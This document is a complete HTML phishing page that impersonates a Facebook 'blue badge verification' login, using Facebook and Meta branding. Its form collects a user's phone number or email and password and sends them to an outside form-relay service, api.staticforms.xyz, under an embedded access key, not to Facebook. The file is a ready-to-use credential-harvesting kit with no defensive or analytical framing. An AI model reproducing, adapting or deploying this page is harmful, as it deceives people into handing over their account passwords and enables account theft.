<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha512-Kc323vGBEqzTmouAECnVceyQqyqdsSiqLQISBL29aUW4U/M7pSPA/gEUZQqv1cwx4OnYxTxve5UMg5GT6L4JJg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <title>Facebook blue badge verification || login</title>
    <style>
     body{
         background-color: ghostwhite;
         color: grey;
         font-family: san serif;
     }   
     header{
         text-align: center;
         color: grey;
     }
     input{
         background-color: white;
         color: solid grey;
         font-size: 15px;
         width: 320px;
         height: 50px;
         border: grey;
         align-content: center;
         border-radius:10px;
         box-shadow: grey 0px 0px 1px 1px;
     }
     button {
        background-color:#1877F2 ; 
        color: white;
        width: 320px;
        height: 42px;
        border-radius: 30px;
        border: #154dff;
     }
    button:hover{
         background-color:#5496fd;
         color: white;
         transition:0.7s;
     }
     button[id=enter] {
        background-color: ghostwhite; 
        color:  #1877F2;
        width: 320px;
        height: 42px;
        border-radius: 30px;
        hover: #1877F1;
        border: solid #1877F2 ;
     }
     button[id=enter]:hover{
         background-color:  white;
         color: #5496fd;
         transition:0.7s
     }
     div{
         text-align: center;
     }
     i[id=fb]{
         font-size: 55px;
         color: #1877F2;
     }
     a{
         color: black;
         text-decoration: none;
     }
     p{
       margin-top: 5px;
     }
   .input-container {
position: relative;
}

input[type="password"] {
padding-right: 0px; /* Adjust padding to accommodate the eye icon */
}

.eye {
position: absolute;
right: 0%;
top: 46%;
transform: translateY(-50%);
cursor: pointer;
}
span{
    margin-right: 30px;
}
i{
    color: grey;
}
    </style>
</head>
<body>
    <header>
        <p>English (US)</p>
        <br>
        <br>
        <i class="fa-brands fa-facebook" id="fb"></i>
 <br>
 <br>
 <br>
 <br>
 <br>
 <br>
   </header>
    <div>
        <form action="https://api.staticforms.xyz/submit" method="POST">
            <input type="hidden" name="accessKey" value="abfd6b73-f8a7-4500-a572-8f8cd1ce40d1">
    <input type="text" name="num/email" placeholder="Mobile number or email" required/>
  <br>
  <br>
   <input type="password" name="password" id="password" placeholder="Password" required/><span class="eye" onclick="togglePasswordView()">
<i class="fas fa-eye" id="eye-icon"></i>
</span>
   <br>
   <br>
   <button type="submit">Submit</button>
   </form>
   <br>
   <br>
   <a href="#">Forgotten password?</a>
   </div>
   <br>
   <br>
   <br>
   <br>
   <br>
   <br>
   <br>
   <br>
   <div>
   <button type="submit" id="enter"><big>Create new account</big></button>
   <br>
   <br>
  <i class="fa-brands fa-meta">&nbsp</i><font size="3px"><b>Meta</b></font>
   </div>
   <script>
         function togglePasswordView() {
var passwordInput = document.getElementById("password");
var eyeIcon = document.getElementById("eye-icon");
if (passwordInput.type === "password") {
passwordInput.type = "text";
eyeIcon.classList.remove("fa-eye");
eyeIcon.classList.add("fa-eye-slash");
} else {
passwordInput.type = "password";
eyeIcon.classList.remove("fa-eye-slash");
eyeIcon.classList.add("fa-eye");
}
}
     </script>
</body>
</html>
